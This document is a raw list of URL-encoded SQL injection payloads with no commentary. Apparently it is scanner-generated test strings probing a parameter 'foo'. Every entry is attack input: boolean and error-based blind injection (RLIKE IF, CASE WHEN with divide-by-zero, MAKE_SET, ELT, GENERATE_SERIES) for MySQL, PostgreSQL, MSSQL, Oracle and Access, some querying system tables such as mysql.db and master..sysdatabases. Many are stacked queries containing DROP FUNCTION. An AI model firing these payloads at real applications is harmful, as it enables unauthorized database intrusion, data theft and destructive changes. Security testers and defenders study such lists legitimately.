foo%29%20RLIKE%20IF%284170%3D2886%2C0x666f6f%2C0x28%29 foo%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29 foo%27%29%20RLIKE%20IF%288204%3D8008%2C0x666f6f%2C0x28%29 foo%27%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29 foo%27%20RLIKE%20IF%287405%3D8864%2C0x666f6f%2C0x28%29 foo%27%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29 foo%22%20RLIKE%20IF%288092%3D4073%2C0x666f6f%2C0x28%29 foo%22%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29 foo%29%20RLIKE%20IF%285271%3D5730%2C0x666f6f%2C0x28%29%20AND%20%289925%3D9925 foo%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%283686%3D3686 foo%29%29%20RLIKE%20IF%285850%3D9461%2C0x666f6f%2C0x28%29%20AND%20%28%288976%3D8976 foo%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%281390%3D1390 foo%29%29%29%20RLIKE%20IF%281837%3D2887%2C0x666f6f%2C0x28%29%20AND%20%28%28%287751%3D7751 foo%29%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%28%282553%3D2553 foo%20RLIKE%20IF%288221%3D2288%2C0x666f6f%2C0x28%29 foo%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29 foo%27%29%20RLIKE%20IF%287504%3D3380%2C0x666f6f%2C0x28%29%20AND%20%28%27bzDf%27%3D%27bzDf foo%27%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%27tkoR%27%3D%27tkoR foo%27%29%29%20RLIKE%20IF%288682%3D4260%2C0x666f6f%2C0x28%29%20AND%20%28%28%27kpZt%27%3D%27kpZt foo%27%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%28%27GGAm%27%3D%27GGAm foo%27%29%29%29%20RLIKE%20IF%287524%3D6998%2C0x666f6f%2C0x28%29%20AND%20%28%28%28%27gzpk%27%3D%27gzpk foo%27%29%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%28%28%27qHvK%27%3D%27qHvK foo%27%20RLIKE%20IF%287154%3D1891%2C0x666f6f%2C0x28%29%20AND%20%27jqtr%27%3D%27jqtr foo%27%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%27ykLM%27%3D%27ykLM foo%27%29%20RLIKE%20IF%282365%3D3185%2C0x666f6f%2C0x28%29%20AND%20%28%27feoz%27%20LIKE%20%27feoz foo%27%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%27XCBG%27%20LIKE%20%27XCBG foo%27%29%29%20RLIKE%20IF%281823%3D1517%2C0x666f6f%2C0x28%29%20AND%20%28%28%27hAse%27%20LIKE%20%27hAse foo%27%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%28%27Elsf%27%20LIKE%20%27Elsf foo%27%29%29%29%20RLIKE%20IF%286766%3D1010%2C0x666f6f%2C0x28%29%20AND%20%28%28%28%27zSuq%27%20LIKE%20%27zSuq foo%27%29%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%28%28%27OWtA%27%20LIKE%20%27OWtA foo%27%20RLIKE%20IF%283252%3D2580%2C0x666f6f%2C0x28%29%20AND%20%27geCv%27%20LIKE%20%27geCv foo%27%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%27ZtWj%27%20LIKE%20%27ZtWj foo%22%29%20RLIKE%20IF%284594%3D4412%2C0x666f6f%2C0x28%29%20AND%20%28%22jaoN%22%3D%22jaoN foo%22%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%22APnl%22%3D%22APnl foo%22%29%29%20RLIKE%20IF%284668%3D7965%2C0x666f6f%2C0x28%29%20AND%20%28%28%22stjx%22%3D%22stjx foo%22%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%28%22aFQE%22%3D%22aFQE foo%22%29%29%29%20RLIKE%20IF%289988%3D3109%2C0x666f6f%2C0x28%29%20AND%20%28%28%28%22cBvY%22%3D%22cBvY foo%22%29%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%28%28%22crMH%22%3D%22crMH foo%22%20RLIKE%20IF%287934%3D6064%2C0x666f6f%2C0x28%29%20AND%20%22qZqd%22%3D%22qZqd foo%22%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%22BySP%22%3D%22BySP foo%22%29%20RLIKE%20IF%282236%3D4803%2C0x666f6f%2C0x28%29%20AND%20%28%22NKCS%22%20LIKE%20%22NKCS foo%22%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%22xdDY%22%20LIKE%20%22xdDY foo%22%29%29%20RLIKE%20IF%283738%3D6457%2C0x666f6f%2C0x28%29%20AND%20%28%28%22LWEr%22%20LIKE%20%22LWEr foo%22%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%28%22CbGp%22%20LIKE%20%22CbGp foo%22%29%29%29%20RLIKE%20IF%283056%3D3807%2C0x666f6f%2C0x28%29%20AND%20%28%28%28%22AQvP%22%20LIKE%20%22AQvP foo%22%29%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%28%28%22pZxp%22%20LIKE%20%22pZxp foo%22%20RLIKE%20IF%287945%3D3016%2C0x666f6f%2C0x28%29%20AND%20%22AGLH%22%20LIKE%20%22AGLH foo%22%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%22biPN%22%20LIKE%20%22biPN foo%25%27%29%20RLIKE%20IF%287498%3D3063%2C0x666f6f%2C0x28%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20RLIKE%20IF%286121%3D5062%2C0x666f6f%2C0x28%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20RLIKE%20IF%288954%3D9855%2C0x666f6f%2C0x28%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20RLIKE%20IF%288213%3D7307%2C0x666f6f%2C0x28%29%20AND%20%27%25%27%3D%27 foo%25%27%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20RLIKE%20IF%289334%3D4516%2C0x666f6f%2C0x28%29%20AND%20%28%27xMXN%27%3D%27xMXN foo%00%27%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%28%27auuM%27%3D%27auuM foo%00%27%20RLIKE%20IF%287737%3D7519%2C0x666f6f%2C0x28%29%20AND%20%27DmVi%27%3D%27DmVi foo%00%27%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20AND%20%27sbqW%27%3D%27sbqW foo%27%29%20WHERE%203726%3D3726%20RLIKE%20IF%281702%3D2488%2C0x666f6f%2C0x28%29%20--%20 foo%27%29%20WHERE%204477%3D4477%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20--%20 foo%22%29%20WHERE%206138%3D6138%20RLIKE%20IF%286047%3D3895%2C0x666f6f%2C0x28%29%20--%20 foo%22%29%20WHERE%207100%3D7100%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20--%20 foo%29%20WHERE%208249%3D8249%20RLIKE%20IF%289826%3D9223%2C0x666f6f%2C0x28%29%20--%20 foo%29%20WHERE%209165%3D9165%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20--%20 foo%27%20WHERE%207656%3D7656%20RLIKE%20IF%287445%3D7576%2C0x666f6f%2C0x28%29%20--%20 foo%27%20WHERE%206346%3D6346%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20--%20 foo%22%20WHERE%201466%3D1466%20RLIKE%20IF%284762%3D9906%2C0x666f6f%2C0x28%29%20--%20 foo%22%20WHERE%203766%3D3766%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20--%20 foo%20WHERE%202603%3D2603%20RLIKE%20IF%289892%3D6713%2C0x666f6f%2C0x28%29%20--%20 foo%20WHERE%204940%3D4940%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20--%20 foo%27%7C%7C%28SELECT%20%27lCEv%27%20FROM%20DUAL%20WHERE%203501%3D3501%20RLIKE%20IF%286005%3D5174%2C0x666f6f%2C0x28%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27NVxi%27%20FROM%20DUAL%20WHERE%209699%3D9699%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27CfTy%27%20WHERE%204406%3D4406%20RLIKE%20IF%285765%3D9646%2C0x666f6f%2C0x28%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27JGQR%27%20WHERE%204133%3D4133%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20JYAm%20WHERE%202635%3D2635%20RLIKE%20IF%284668%3D8103%2C0x666f6f%2C0x28%29%20%29%2B%27 foo%27%2B%28SELECT%20KYxA%20WHERE%208689%3D8689%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20%29%2B%27 foo%27%2B%28SELECT%20%27hbzv%27%20WHERE%204580%3D4580%20RLIKE%20IF%288696%3D4605%2C0x666f6f%2C0x28%29%20%29%2B%27 foo%27%2B%28SELECT%20%27KOUe%27%20WHERE%206921%3D6921%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%286713%3D2816%2C0x666f6f%2C0x28%29%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%283603%3D3603%2C0x666f6f%2C0x28%29%20%23 %28SELECT%20%28CASE%20WHEN%20%284933%3D8054%29%20THEN%20%27foo%27%20ELSE%201%2F%28SELECT%200%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%288977%3D8977%29%20THEN%20%27foo%27%20ELSE%201%2F%28SELECT%200%29%20END%29%29 MAKE_SET%285166%3D1662%2C0x666f6f%29 MAKE_SET%283794%3D3794%2C0x666f6f%29 ELT%287425%3D2558%2C0x666f6f%29 ELT%287463%3D7463%2C0x666f6f%29 %284233%3D9159%29%2A0x666f6f %289220%3D9220%29%2A0x666f6f %28SELECT%20%28CASE%20WHEN%20%284257%3D9665%29%20THEN%200x666f6f%20ELSE%204257%2A%28SELECT%204257%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%282195%3D2195%29%20THEN%200x666f6f%20ELSE%202195%2A%28SELECT%202195%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%286591%3D7037%29%20THEN%200x666f6f%20ELSE%206591%2A%28SELECT%206591%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%284558%3D4558%29%20THEN%200x666f6f%20ELSE%204558%2A%28SELECT%204558%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20GENERATE_SERIES%28%28CHR%28102%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%29%2C%28CHR%28102%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%29%2CCASE%20WHEN%20%283994%3D9101%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20GENERATE_SERIES%28%28CHR%28102%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%29%2C%28CHR%28102%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%29%2CCASE%20WHEN%20%283335%3D3335%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20%28CASE%20WHEN%20%284015%3D3840%29%20THEN%20CHAR%28102%29%2BCHAR%28111%29%2BCHAR%28111%29%20ELSE%204015%2A%28SELECT%204015%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%288549%3D8549%29%20THEN%20CHAR%28102%29%2BCHAR%28111%29%2BCHAR%28111%29%20ELSE%208549%2A%28SELECT%208549%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%282854%3D7395%29%20THEN%20CHR%28102%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 %28SELECT%20%28CASE%20WHEN%20%288197%3D8197%29%20THEN%20CHR%28102%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 IIF%284154%3D9395%2CCHR%28102%29%26CHR%28111%29%26CHR%28111%29%2C1%2F0%29 IIF%282870%3D2870%2CCHR%28102%29%26CHR%28111%29%26CHR%28111%29%2C1%2F0%29 %28CASE%20WHEN%209513%3D2049%20THEN%20%27foo%27%20ELSE%20NULL%20END%29 %28CASE%20WHEN%208897%3D8897%20THEN%20%27foo%27%20ELSE%20NULL%20END%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%285845%3D4302%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%281379%3D1379%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%284452%3D6235%29%20THEN%20%27foo%27%20ELSE%201%2F%28SELECT%200%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%287434%3D7434%29%20THEN%20%27foo%27%20ELSE%201%2F%28SELECT%200%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%286787%3D2671%29%20THEN%200x666f6f%20ELSE%206787%2A%28SELECT%206787%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%287174%3D7174%29%20THEN%200x666f6f%20ELSE%207174%2A%28SELECT%207174%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%285047%3D5027%29%20THEN%200x666f6f%20ELSE%205047%2A%28SELECT%205047%20FROM%20mysql.db%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%288117%3D8117%29%20THEN%200x666f6f%20ELSE%208117%2A%28SELECT%208117%20FROM%20mysql.db%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%289673%3D3470%29%20THEN%20CHAR%28102%29%2BCHAR%28111%29%2BCHAR%28111%29%20ELSE%209673%2A%28SELECT%209673%20FROM%20master..sysdatabases%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%283296%3D3296%29%20THEN%20CHAR%28102%29%2BCHAR%28111%29%2BCHAR%28111%29%20ELSE%203296%2A%28SELECT%203296%20FROM%20master..sysdatabases%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%283906%3D9768%29%20THEN%20CHR%28102%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%285505%3D5505%29%20THEN%20CHR%28102%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 foo%2CIIF%289321%3D6792%2CCHR%28102%29%26CHR%28111%29%26CHR%28111%29%2C1%2F0%29 foo%2CIIF%285768%3D5768%2CCHR%28102%29%26CHR%28111%29%26CHR%28111%29%2C1%2F0%29 foo%29%3B%20IF%28%282976%3D7311%29%2CSELECT%202976%2CDROP%20FUNCTION%20aZuQ%29%23 foo%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%29%3B%20IF%28%289390%3D4796%29%2CSELECT%209390%2CDROP%20FUNCTION%20UvDp%29%23 foo%27%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%3B%20IF%28%287300%3D9146%29%2CSELECT%207300%2CDROP%20FUNCTION%20QOBY%29%23 foo%27%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%22%3B%20IF%28%288079%3D6253%29%2CSELECT%208079%2CDROP%20FUNCTION%20JmOg%29%23 foo%22%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%29%3B%20IF%28%284249%3D1011%29%2CSELECT%204249%2CDROP%20FUNCTION%20jgyc%29%23 foo%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%29%29%3B%20IF%28%289222%3D6981%29%2CSELECT%209222%2CDROP%20FUNCTION%20hxcE%29%23 foo%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%29%29%29%3B%20IF%28%281489%3D9188%29%2CSELECT%201489%2CDROP%20FUNCTION%20Dleu%29%23 foo%29%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%3B%20IF%28%282985%3D4141%29%2CSELECT%202985%2CDROP%20FUNCTION%20aIXz%29%23 foo%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%29%3B%20IF%28%287850%3D3921%29%2CSELECT%207850%2CDROP%20FUNCTION%20suwG%29%23 foo%27%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%29%29%3B%20IF%28%284200%3D5004%29%2CSELECT%204200%2CDROP%20FUNCTION%20SkQe%29%23 foo%27%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%29%29%29%3B%20IF%28%288118%3D6944%29%2CSELECT%208118%2CDROP%20FUNCTION%20bnQH%29%23 foo%27%29%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%3B%20IF%28%285738%3D2014%29%2CSELECT%205738%2CDROP%20FUNCTION%20Ayip%29%23 foo%27%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%29%3B%20IF%28%283176%3D8655%29%2CSELECT%203176%2CDROP%20FUNCTION%20XZnd%29%23 foo%27%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%29%29%3B%20IF%28%285948%3D7946%29%2CSELECT%205948%2CDROP%20FUNCTION%20qqHR%29%23 foo%27%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%29%29%29%3B%20IF%28%283118%3D2536%29%2CSELECT%203118%2CDROP%20FUNCTION%20oOaQ%29%23 foo%27%29%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%3B%20IF%28%287268%3D8894%29%2CSELECT%207268%2CDROP%20FUNCTION%20rXLs%29%23 foo%27%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%22%29%3B%20IF%28%286546%3D2982%29%2CSELECT%206546%2CDROP%20FUNCTION%20hBxL%29%23 foo%22%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%22%29%29%3B%20IF%28%289147%3D6867%29%2CSELECT%209147%2CDROP%20FUNCTION%20tDZj%29%23 foo%22%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%22%29%29%29%3B%20IF%28%282103%3D9994%29%2CSELECT%202103%2CDROP%20FUNCTION%20pJxW%29%23 foo%22%29%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%22%3B%20IF%28%283431%3D3423%29%2CSELECT%203431%2CDROP%20FUNCTION%20gGEN%29%23 foo%22%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%22%29%3B%20IF%28%281504%3D2368%29%2CSELECT%201504%2CDROP%20FUNCTION%20hysR%29%23 foo%22%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%22%29%29%3B%20IF%28%286822%3D9398%29%2CSELECT%206822%2CDROP%20FUNCTION%20KIcN%29%23 foo%22%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%22%29%29%29%3B%20IF%28%286315%3D9170%29%2CSELECT%206315%2CDROP%20FUNCTION%20hvPr%29%23 foo%22%29%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%22%3B%20IF%28%281639%3D3950%29%2CSELECT%201639%2CDROP%20FUNCTION%20GZzQ%29%23 foo%22%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%25%27%29%3B%20IF%28%287064%3D3335%29%2CSELECT%207064%2CDROP%20FUNCTION%20fpJa%29%23 foo%25%27%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%25%27%29%29%3B%20IF%28%284423%3D2794%29%2CSELECT%204423%2CDROP%20FUNCTION%20OWpF%29%23 foo%25%27%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%25%27%29%29%29%3B%20IF%28%281969%3D1000%29%2CSELECT%201969%2CDROP%20FUNCTION%20igQO%29%23 foo%25%27%29%29%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%25%27%3B%20IF%28%281647%3D8767%29%2CSELECT%201647%2CDROP%20FUNCTION%20rtQM%29%23 foo%25%27%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%00%27%29%3B%20IF%28%286102%3D7612%29%2CSELECT%206102%2CDROP%20FUNCTION%20gTnA%29%23 foo%00%27%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%00%27%3B%20IF%28%281493%3D3634%29%2CSELECT%201493%2CDROP%20FUNCTION%20dNhL%29%23 foo%00%27%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%29%20WHERE%208579%3D8579%3B%20IF%28%284554%3D9257%29%2CSELECT%204554%2CDROP%20FUNCTION%20HZLD%29%23 foo%27%29%20WHERE%209562%3D9562%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%22%29%20WHERE%206812%3D6812%3B%20IF%28%284665%3D1306%29%2CSELECT%204665%2CDROP%20FUNCTION%20leQy%29%23 foo%22%29%20WHERE%201090%3D1090%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%29%20WHERE%209517%3D9517%3B%20IF%28%288613%3D1916%29%2CSELECT%208613%2CDROP%20FUNCTION%20dYSV%29%23 foo%29%20WHERE%208781%3D8781%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%20WHERE%202695%3D2695%3B%20IF%28%284677%3D9941%29%2CSELECT%204677%2CDROP%20FUNCTION%20VakU%29%23 foo%27%20WHERE%203308%3D3308%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%22%20WHERE%208223%3D8223%3B%20IF%28%284252%3D7574%29%2CSELECT%204252%2CDROP%20FUNCTION%20EPVy%29%23 foo%22%20WHERE%201167%3D1167%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%20WHERE%206325%3D6325%3B%20IF%28%287203%3D6610%29%2CSELECT%207203%2CDROP%20FUNCTION%20NLKM%29%23 foo%20WHERE%204956%3D4956%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%7C%7C%28SELECT%20%27DxJv%27%20FROM%20DUAL%20WHERE%203576%3D3576%3B%20IF%28%285785%3D5752%29%2CSELECT%205785%2CDROP%20FUNCTION%20GEBR%29%23 foo%27%7C%7C%28SELECT%20%27uJLh%27%20FROM%20DUAL%20WHERE%201438%3D1438%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%7C%7C%28SELECT%20%27IGBL%27%20WHERE%202474%3D2474%3B%20IF%28%289197%3D4137%29%2CSELECT%209197%2CDROP%20FUNCTION%20uusw%29%23 foo%27%7C%7C%28SELECT%20%27CAXF%27%20WHERE%206551%3D6551%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%2B%28SELECT%20Dwkh%20WHERE%201712%3D1712%3B%20IF%28%284618%3D1463%29%2CSELECT%204618%2CDROP%20FUNCTION%20KuCr%29%23 foo%27%2B%28SELECT%20YPcv%20WHERE%205395%3D5395%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%2B%28SELECT%20%27TLyg%27%20WHERE%205623%3D5623%3B%20IF%28%286897%3D5298%29%2CSELECT%206897%2CDROP%20FUNCTION%20gWZz%29%23 foo%27%2B%28SELECT%20%27zcGB%27%20WHERE%209038%3D9038%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%282817%3D1422%29%2CSELECT%202817%2CDROP%20FUNCTION%20pSiq%29%23 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%283807%3D3807%29%2CSELECT%203807%2CDROP%20FUNCTION%20EEpv%29%23 foo%29%3B%20IF%289621%3D1202%29%20SELECT%209621%20ELSE%20DROP%20FUNCTION%20DmOZ-- foo%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%29%3B%20IF%281530%3D8868%29%20SELECT%201530%20ELSE%20DROP%20FUNCTION%20HoiH-- foo%27%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%3B%20IF%283583%3D4264%29%20SELECT%203583%20ELSE%20DROP%20FUNCTION%20GroG-- foo%27%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%22%3B%20IF%286308%3D9266%29%20SELECT%206308%20ELSE%20DROP%20FUNCTION%20eucy-- foo%22%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%29%3B%20IF%283307%3D1521%29%20SELECT%203307%20ELSE%20DROP%20FUNCTION%20rIWR-- foo%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%29%29%3B%20IF%281548%3D2061%29%20SELECT%201548%20ELSE%20DROP%20FUNCTION%20Hwss-- foo%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%29%29%29%3B%20IF%284751%3D1610%29%20SELECT%204751%20ELSE%20DROP%20FUNCTION%20OfRD-- foo%29%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%3B%20IF%283548%3D5586%29%20SELECT%203548%20ELSE%20DROP%20FUNCTION%20YlnP-- foo%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%29%3B%20IF%286697%3D1180%29%20SELECT%206697%20ELSE%20DROP%20FUNCTION%20hoCQ-- foo%27%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%29%29%3B%20IF%286107%3D5953%29%20SELECT%206107%20ELSE%20DROP%20FUNCTION%20viIk-- foo%27%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- 